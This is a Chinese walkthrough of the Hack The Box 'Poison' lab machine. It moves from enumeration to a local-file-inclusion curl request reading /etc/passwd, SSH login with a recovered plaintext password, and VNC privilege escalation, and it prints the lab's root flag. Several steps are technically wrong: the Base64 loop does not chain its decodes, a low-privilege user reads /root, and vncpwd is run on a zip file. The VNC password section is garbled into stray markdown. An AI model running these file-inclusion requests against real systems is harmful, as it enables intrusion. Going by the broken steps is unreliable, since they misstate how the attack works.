Hack The Box之Poison靶场练习教学文档

1. 靶场概述

Poison是Hack The Box平台上的一个靶机，主要考察以下安全知识点：

• 信息收集与枚举
• 文件包含漏洞利用
• 多次Base64解密
• SSH凭证利用
• VNC服务提权

2. 环境准备

1. 连接到Hack The Box VPN
2. 获取靶机IP地址（假设为10.10.10.xx）
3. 准备Kali Linux或其他渗透测试环境

3. 信息收集阶段

3.1 端口扫描

使用nmap进行端口扫描：

nmap -sV -sC -p- 10.10.10.xx

扫描结果：

• 22/tcp - SSH服务
• 80/tcp - HTTP服务

3.2 Web目录枚举

使用dirb或gobuster扫描Web目录：

gobuster dir -u http://10.10.10.xx -w /usr/share/wordlists/dirb/common.txt

发现以下重要文件：

• /browse.php
• /pwdbackup.txt

4. 漏洞利用

4.1 文件包含漏洞

1. 访问http://10.10.10.xx/browse.php，发现文件包含参数file
2. 尝试读取/etc/passwd：

curl "http://10.10.10.xx/browse.php?file=/etc/passwd"

发现系统存在两个用户：root和charix

3. 读取pwdbackup.txt：

curl "http://10.10.10.xx/browse.php?file=pwdbackup.txt"

获取到加密的密码备份文件，提示该密码被加密了至少13次

4.2 密码解密

1. 密码格式为Base64编码，需进行多次解密
2. 使用以下命令进行13次Base64解码：

for i in {1..13}; do echo "加密字符串" | base64 -d; done

最终得到明文密码：Charix!2#4%6&8(0

5. 初始访问

5.1 SSH登录

使用获取的凭证登录SSH：

ssh charix@10.10.10.xx

密码：Charix!2#4%6&8(0

5.2 获取user flag

登录后查看用户flag：

cat /home/charix/user.txt

6. 权限提升

6.1 信息收集

1. 检查运行进程：

ps aux

发现VNC相关进程

2. 检查监听端口：

netstat -tulnp

发现5801和5901端口开放

3. 在根目录发现secret.zip：

ls -la /root

6.2 VNC利用

1. 将secret.zip传输到本地：

scp charix@10.10.10.xx:/root/secret.zip .

2. 使用vncpwd工具解密VNC密码：

vncpwd secret.zip

得到VNC密码：`VNCP@

\[!` 3. 端口转发（可选）： ```bash ssh -L 5901:127.0.0.1:5901 charix@10.10.10.xx ``` 4. 使用vncviewer连接： ```bash vncviewer 127.0.0.1:5901 ``` 输入密码`VNCP@ \]

!`后获得root shell

6.3 获取root flag

在VNC会话中查看root flag：

cat /root/root.txt

flag值为：716d04b188419cf2bb99d891272361f5

7. 总结

本靶场的关键技术点：

1. 通过文件包含漏洞读取系统敏感文件
2. 多次Base64解密获取明文凭证
3. 利用SSH凭证获取初始访问
4. 通过VNC服务实现权限提升
5. 使用vncpwd工具解密VNC密码

8. 防御建议

1. 避免使用文件包含功能，或严格限制包含范围
2. 避免使用简单的加密方式存储敏感信息
3. 限制VNC等远程管理服务的访问
4. 使用强密码并定期更换
5. 实施最小权限原则